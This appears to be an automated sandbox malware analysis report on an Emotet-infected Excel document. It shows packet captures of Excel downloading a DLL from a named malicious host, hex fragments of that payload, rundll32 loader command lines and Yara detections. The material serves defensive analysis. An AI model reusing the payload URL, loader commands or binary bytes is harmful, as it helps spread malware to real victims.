Dec 2, 2021 14:31:35.237119913 CET	8	IN	Data Raw: 2e bb c1 bb b4 d8 87 6d 60 ad e7 5e 3b f2 c4 7a 7b a6 19 1d db 7f 7a 4c 1b b2 d0 bd 5e 0f fd 80 43 87 57 b5 08 01 86 b5 98 dd e8 ec 2c 3e 14 26 8c a3 7b 85 f5 2f d5 62 37 19 86 a3 99 45 ab f5 5a 22 98 1a e6 b8 20 34 69 f6 33 a5 ce c3 ee 21 3c 21 Data Ascii: .m`^;z{zL^CW,>&{/b7EZ" 4i3!<!"`M=Oy #x$aC.azWTxez>{a\|B@-N )NNN9JbmjxLih=W3Th;%a?&<N>+ =#<9W
Dec 2, 2021 14:31:35.244168997 CET	9	IN	Data Raw: 35 38 32 0d 0a ed 5d db 6e e3 36 10 7d ae bf 62 aa 3e a4 5d 84 b2 6e 71 ac d4 6b 60 91 a2 4f 41 5b 14 c1 16 c5 76 61 28 12 bd 91 eb 48 86 a5 64 b3 05 fa 41 fd 8d 7e 59 71 86 17 51 b2 93 38 5d f4 02 b4 0f b6 65 6a 44 4a d4 70 38 33 67 c8 31 7f 20 Data Ascii: 582]n6}b>]nqk`OA[va(HdA~YqQ8]ejDJp83g1 \x/ 0Gn6pwl-dCm9h?/nUp(PS/H.ClX]tA$S:#3s=1R4M"?\~b?QO(qQpJqS#`
Dec 2, 2021 14:31:35.244185925 CET	9	IN	Data Raw: c5 1d 76 e8 d2 22 75 87 8b b6 5e b4 f5 c6 ac 6a 59 35 ba 6b 4c 5f ea e5 45 8f 76 c4 b3 bb f5 a9 77 6f 97 41 ad 1a a4 3d 95 37 57 b2 d8 c9 6e 6a 93 8b f1 69 b1 6a 8e 9c f7 3a 9a 8d 11 d9 ce a3 54 a5 48 fe 03 bb 94 1e 33 33 79 00 00 0d 0a Data Ascii: v"u^jY5kL_EvwoA=7Wnjij:TH33y
Dec 2, 2021 14:31:35.244194984 CET	9	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	47.96.4.95	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 14:31:35.864459038 CET	10	OUT	GET /wp-content/we8xi/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.duoyuhudong.cn Connection: Keep-Alive
Dec 2, 2021 14:31:36.126859903 CET	12	IN	HTTP/1.1 200 OK Server: nginx/1.8.1 Date: Thu, 02 Dec 2021 13:31:35 GMT Content-Type: application/x-msdownload Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.2.15 Set-Cookie: 61a8cab7f1108=1638451895; expires=Thu, 02-Dec-2021 13:32:35 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Thu, 02 Dec 2021 13:31:35 GMT Expires: Thu, 02 Dec 2021 13:31:35 GMT Content-Disposition: attachment; filename="VZZdgPFp2xiOJtfpv.dll" Content-Transfer-Encoding: binary Data Raw: 31 65 35 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d2 30 86 d7 96 51 e8 84 96 51 e8 84 96 51 e8 84 45 23 eb 85 9c 51 e8 84 45 23 ed 85 1e 51 e8 84 45 23 ec 85 82 51 e8 84 2f 24 ed 85 94 51 e8 84 c4 24 ed 85 b4 51 e8 84 c4 24 ec 85 99 51 e8 84 c4 24 eb 85 82 51 e8 84 45 23 e9 85 93 51 e8 84 96 51 e9 84 f7 51 e8 84 96 51 e8 84 97 51 e8 84 2f 24 e8 85 97 51 e8 84 2f 24 ea 85 97 51 e8 84 52 69 63 68 96 51 e8 84 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0e 10 a7 61 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 1d 00 66 02 00 00 52 03 00 00 00 00 00 01 a4 01 00 00 10 00 00 00 80 02 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 05 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 83 05 00 ac 08 00 00 3c 8c 05 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 05 00 b0 1b 00 00 dc 6f 05 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 05 00 18 00 00 00 30 70 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 64 02 00 00 10 00 00 00 66 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fa 13 03 00 00 80 02 00 00 14 03 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 18 00 00 00 a0 05 00 00 0e 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 6c 06 00 00 00 c0 05 00 00 08 00 00 00 8c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 b0 1b 00 00 00 d0 05 00 00 1c 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1e50MZ@!L!This program cannot be run in DOS mode.$0QQQE#QE#QE#Q/$Q$Q$Q$QE#QQQQQ/$Q/$QRichQPELa"!fR@<<oTq0p@T.textdf `.rdataj@@.dataD~@.pdatal@.reloc@B
Dec 2, 2021 14:31:36.126895905 CET	13	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ttQj
Dec 2, 2021 14:31:36.126919031 CET	14	IN	Data Raw: ba 01 00 00 00 e8 d4 57 02 00 0f 0b 66 90 55 83 ec 0c 8d 75 94 ba 00 30 02 00 8b 6e 58 8b 4e 0c e8 89 fb ff ff 83 c4 0c 5d c3 cc cc cc cc b8 8c fc ff ff c3 cc cc cc cc cc cc cc cc cc cc b8 f5 02 00 00 c3 cc cc cc cc cc cc cc cc cc cc b8 1d 02 00 Data Ascii: WfUu0nXN]TR0@&
Dec 2, 2021 14:31:36.126943111 CET	16	IN	Data Raw: cc cc cc cc b8 4f 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc b8 8c ff ff ff c3 cc cc cc cc cc cc cc cc cc cc b8 d2 ff ff ff c3 cc cc cc cc cc cc cc cc cc cc b8 93 02 00 00 c3 cc cc cc cc cc cc cc cc cc cc b8 e8 fd ff ff c3 cc cc cc cc cc cc cc cc Data Ascii: OiikhSD$f.
Dec 2, 2021 14:31:36.126980066 CET	17	IN	Data Raw: f9 00 00 11 00 8b 4c 24 04 0f 85 5b ff ff ff e9 84 00 00 00 31 ff 89 d3 39 cb 74 7c 8a 03 84 c0 0f 89 a3 00 00 00 8b 54 24 04 8d 4b 01 39 d1 74 16 0f b6 4b 01 83 c3 02 83 e1 3f c1 e1 06 3c e0 73 0f e9 82 00 00 00 89 d1 89 d3 31 c9 3c e0 72 78 8b Data Ascii: L$[19t\|T$K9tK?<s1<rxT$9t3C?<sc1<r[;\$t?1u1T$\|$,$\$iT$t@sB1L$,T$91<:$\$
Dec 2, 2021 14:31:36.127013922 CET	18	IN	Data Raw: eb 0e 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 89 54 24 0c 89 4c 24 10 8b 74 bb fc 8b 0c bb 85 f6 74 16 31 d2 83 fe 01 75 16 81 7c c8 04 70 1a 00 10 75 0c 8b 0c c8 8b 09 ba 01 00 00 00 eb 00 89 54 24 14 89 4c 24 18 8d 54 24 04 8b 4c bb f0 52 ff Data Ascii: f.@T$L$tt1u\|puT$L$T$LR4T!\|$@l$(eGt\7,1Ef.@DtL$ P4t$$QuJD$P4Tu7C9u\|$@11;oBsL
Dec 2, 2021 14:31:36.127036095 CET	19	IN	Data Raw: 24 29 ca 01 c8 01 f8 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 80 3c 18 0a 74 07 43 39 da 75 f5 eb 23 01 cb 8b 0c 24 01 cb 89 d9 41 74 0a 39 ce 72 06 80 3c 1f 0a 74 42 89 f2 29 ca 0f 83 cb fe ff ff 0f 1f 00 31 db 89 f1 39 ce 88 5d 00 76 35 80 Data Ascii: $)f.D<tC9u#$At9r<tB)19]v5<~[QWt$D$Pu7<]V9]wfu*VWt$D$P21 ^_[]hlPjh:Ch\|VPCE
Dec 2, 2021 14:31:36.127058983 CET	20	IN	Data Raw: 32 30 30 30 0d 0a 89 4c 24 18 51 89 44 24 18 ff d0 83 c4 08 84 c0 74 0a b0 01 83 c4 18 5e 5f 5b 5d c3 8b 44 24 2c 8b 30 8d 4e f7 83 f9 1e 77 44 8b 0c 8d 98 2d 00 10 8b 54 24 0c bd 74 00 00 00 b8 02 00 00 00 01 d1 ff e1 b8 02 00 00 00 bd 6e 00 00 Data Ascii: 2000L$QD$t^_[]D$,0NwD-T$tnD$$1n.T$\u#D$$1.T$D$$1D$.
Dec 2, 2021 14:31:36.127083063 CET	22	IN	Data Raw: 00 00 00 8b 11 31 f6 8d bc 24 84 00 00 00 bd 30 00 00 00 89 d3 0f 1f 80 00 00 00 00 89 d1 c1 eb 04 b8 57 00 00 00 80 e1 0f 80 f9 0a 0f 42 c5 46 00 c8 83 fa 0f 89 da 88 47 ff 8d 7f ff 77 dd b9 80 00 00 00 29 f1 81 f9 81 00 00 00 0f 83 b1 00 00 00 Data Ascii: 1$0WBFGw)$VZ1$0f.7BEGw)sU$UWj4cfT'`t)WVj'
Dec 2, 2021 14:31:36.127108097 CET	23	IN	Data Raw: e2 3f 80 ca 80 88 54 24 02 88 4c 24 03 b9 04 00 00 00 89 e2 51 52 50 e8 f6 f2 ff ff 83 c4 0c 59 c3 cc 83 ec 18 8b 44 24 20 8d 4c 24 1c ba e4 b6 04 10 f2 0f 10 40 10 f2 0f 10 10 f2 0f 10 48 08 89 e0 f2 0f 11 44 24 10 f2 0f 11 4c 24 08 f2 0f 11 14 Data Ascii: ?T$L$QRPYD$ L$@HD$L$$PD$t$t$0PD$L$$s$s?$L$gs)$??T$
Dec 2, 2021 14:31:36.386648893 CET	25	IN	Data Raw: 80 fd 0c 73 0b 84 c9 79 5d 80 f9 bf 76 13 eb 56 80 e3 fe 80 fb ee 75 4e 84 c9 79 4a 80 f9 c0 73 45 8d 48 02 39 f1 73 1d 80 7c 0d 00 bf 7f 27 41 89 c8 e9 32 fe ff ff 8b 4c 24 0c 31 c0 89 69 04 89 71 08 eb 3d c7 04 24 00 00 00 00 c7 44 24 04 00 00 Data Ascii: sy]vVuNyJsEH9s\|'A2L$1iq=$D$$$$L$L$AQ^_[]USWV \$<1T$L$u111$(f.@L)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1612 Parent PID: 596

General

Start time:	14:31:17
Start date:	02/12/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13fd50000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2684 Parent PID: 1612

General

Start time:	14:31:25
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Imagebase:	0x250000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2800 Parent PID: 400

General

Start time:	14:31:56
Start date:	02/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0xff860000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1500 Parent PID: 2684

General

Start time:	14:32:26
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Imagebase:	0x250000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2948 Parent PID: 1500

General

Start time:	14:33:31
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Imagebase:	0x250000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: EXCEL.EXE PID: 1612 Parent PID: 596 EXCEL.EXECOMMON

Executed Functions

Non-executed Functions

Function 025E66F3, Relevance: .9, Instructions: 946COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.748593490.00000000025E0000.00000004.00000001.sdmp, Offset: 025E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f5ce752277cd0ea9d021c26da8d4a326d32c7261f48613cc1289de86b58745
Instruction ID: b99edd919347c1dbdf4d1c96d41baea66c089ac2e30c6d707b83c5231d494080
Opcode Fuzzy Hash: 93f5ce752277cd0ea9d021c26da8d4a326d32c7261f48613cc1289de86b58745
Instruction Fuzzy Hash: DC72555154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763

Uniqueness

Uniqueness Score: -1.00%

Function 025E66E8, Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.748593490.00000000025E0000.00000004.00000001.sdmp, Offset: 025E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4a15b30d079047791a4c799ed446e114603252ff51353cc79eabf7a51f635d
Instruction ID: 8a633704a1a404f2091407d130fc78f6f8f0b3b6fa6ed0bdd4306d42df7ec871
Opcode Fuzzy Hash: 3e4a15b30d079047791a4c799ed446e114603252ff51353cc79eabf7a51f635d
Instruction Fuzzy Hash: 8372655154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763

Uniqueness

Uniqueness Score: -1.00%

Function 025E6753, Relevance: .9, Instructions: 925COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.748593490.00000000025E0000.00000004.00000001.sdmp, Offset: 025E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4315e1e5858965ddf50f929e7e63364c78336bc8f6d837f90ff0211a2441ed07
Instruction ID: 47dc25e25e5a9b658f7cbaaa456cb3339ca02418816a6d7d3c650a2197a5bd95
Opcode Fuzzy Hash: 4315e1e5858965ddf50f929e7e63364c78336bc8f6d837f90ff0211a2441ed07
Instruction Fuzzy Hash: 5F72655154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763

Uniqueness

Uniqueness Score: -1.00%

Function 025E6743, Relevance: .9, Instructions: 909COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.748593490.00000000025E0000.00000004.00000001.sdmp, Offset: 025E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118bee8a9fbbcd473c18d031b55ada85e14fff4030955ead3cc970db53f50afd
Instruction ID: 87d89f2ba78be5ce499518e541bb8d5e5bacdbe3695142f125d8d012a9e8770a
Opcode Fuzzy Hash: 118bee8a9fbbcd473c18d031b55ada85e14fff4030955ead3cc970db53f50afd
Instruction Fuzzy Hash: EB72665154E3D11FC70787380DB96A6BF71AE53118B2E91DBC6C2DB8E3E608492AC763

Uniqueness

Uniqueness Score: -1.00%

Function 025E6340, Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.748593490.00000000025E0000.00000004.00000001.sdmp, Offset: 025E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
Instruction ID: 7e91e0064a102ae4f8d0645e20062a809d95068df121401edc0ef28c09dea1f9
Opcode Fuzzy Hash: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
Instruction Fuzzy Hash: AAC1515545E3D20FD71383380EB91927FB19E97158B2E15CBC2C2DF4A3EA180A6AD723

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2684 Parent PID: 1612 rundll32.exeCOMMON

Executed Functions

Function 6E449990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E449B65
GetLastError.KERNEL32 ref: 6E449B6B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6E449B87

Strings

asd, xrefs: 6E449B5C

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: e5009819c2a1bf190ea4d9dd47d99184923ccb7d1970ab2f1e3c9a0f5da69aff
Instruction ID: e0583c2df4abc8e83597ea52b2dfaafea410a6c7d6c962399baa613d5ee4d0b9
Opcode Fuzzy Hash: e5009819c2a1bf190ea4d9dd47d99184923ccb7d1970ab2f1e3c9a0f5da69aff
Instruction Fuzzy Hash: 04E1B971A08306CFEB50DFA8C980B1AB7E1FF88714F18456EEA549B345D772E845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E431290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E4497A0: GetTickCount64.KERNEL32 ref: 6E4497D6
Part of subcall function 6E4497A0: GetTickCount64.KERNEL32 ref: 6E4497F4
Part of subcall function 6E4497A0: GetTickCount64.KERNEL32 ref: 6E44980D
Part of subcall function 6E4497A0: GetTickCount64.KERNEL32 ref: 6E44980F
Part of subcall function 6E4497A0: GetTickCount64.KERNEL32 ref: 6E449816
Part of subcall function 6E4497A0: GetTickCount64.KERNEL32 ref: 6E449834

GetProcessHeap.KERNEL32 ref: 6E431337
HeapAlloc.KERNEL32(00260000,00000000,00023000), ref: 6E431351
HeapFree.KERNEL32(00000000,?), ref: 6E431435

Strings

'`Ly, xrefs: 6E431319

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID: '`Ly
API String ID: 2047189075-560155178
Opcode ID: 52f547dacceb89fba2fce5b26082d59906c56fefb364aeea2a1dd38ba293048d
Instruction ID: 369d06fa03333021def9a9071b9e7bfad4487c3efd3bc12821e7dd56393f30b9
Opcode Fuzzy Hash: 52f547dacceb89fba2fce5b26082d59906c56fefb364aeea2a1dd38ba293048d
Instruction Fuzzy Hash: CA518870600B408BE3248F75D980F57BBE5FF59318F208A2ED8968BB85E734F5058B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E44A21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E44A262
___scrt_uninitialize_crt.LIBCMT ref: 6E44A27C

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: bc7ed3fba18a2b5999309e5768cd8f6fe41975a397ec1441f52066e1082aea21
Instruction ID: 4edbc89bb0139e345ac4aebc964cabce0b1e19ebb4de999c4c75b1cba70626bb
Opcode Fuzzy Hash: bc7ed3fba18a2b5999309e5768cd8f6fe41975a397ec1441f52066e1082aea21
Instruction Fuzzy Hash: 51419D72B05615EBFB618FF58800EAE3AA9EF45794F01492BE815A6340F7718941BBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E451BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6E451D09,FFFDD001,00000400,?,00000000,?,?,6E451E82,00000021,FlsSetValue,6E4839F8,6E483A00,?), ref: 6E451CBD

Strings

api-ms-, xrefs: 6E451C53
ext-ms-, xrefs: 6E451C67

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 2da7c1bca5205240a97b60bea24fc08f217d57464646d0edccd53818045dbe2b
Instruction ID: 41cccb33649839c07709a1a3f7c58ff67390a21be10eebc15ee4bf7f99e95147
Opcode Fuzzy Hash: 2da7c1bca5205240a97b60bea24fc08f217d57464646d0edccd53818045dbe2b
Instruction Fuzzy Hash: 81210876A01E25ABDB13AEB5DC44F4B3768EB43764F110127E911A7384DB31E915CED0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44DD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E44DE23,00000000,?,00000001,00000000,?,6E44DE9A,00000001,FlsFree,6E482F84,FlsFree,00000000), ref: 6E44DDF2

Strings

api-ms-, xrefs: 6E44DDB2

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: c2c82e6483436961d6b00c771ec7eddcfbcfd2081cffbb234136153a784fb830
Instruction ID: a0b9c996fdc779a9244cfe7c743df3813651d6de7254541628386ca7307b455e
Opcode Fuzzy Hash: c2c82e6483436961d6b00c771ec7eddcfbcfd2081cffbb234136153a784fb830
Instruction Fuzzy Hash: D411A7B2B55A25EBFF126AF89C44F4A33A4EF07770F110122E911AB384DB70E9018AD5

Uniqueness

Uniqueness Score: -1.00%

Function 6E44A2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6E44A308
dllmain_crt_dispatch.LIBCMT ref: 6E44A31F
dllmain_raw.LIBCMT ref: 6E44A367
dllmain_crt_dispatch.LIBCMT ref: 6E44A37A
dllmain_raw.LIBCMT ref: 6E44A38D

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: ceefc4a1944146d041b0744194c4409f2d3e4e902885147f7dabfcd2eb9d740b
Instruction ID: 4ddc8369a6c844f1745518110253b763a3dc43eaa4cee7c37d0a75399081abd9
Opcode Fuzzy Hash: ceefc4a1944146d041b0744194c4409f2d3e4e902885147f7dabfcd2eb9d740b
Instruction Fuzzy Hash: AB217E72B01519EBEB614EB5C840EAF3A69EF85B94F01453BE81597310F3318D51ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E451AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E451AA9

Part of subcall function 6E4519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E453B22,?,00000000,-00000008), ref: 6E451A5F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E451AE1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E451B01

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
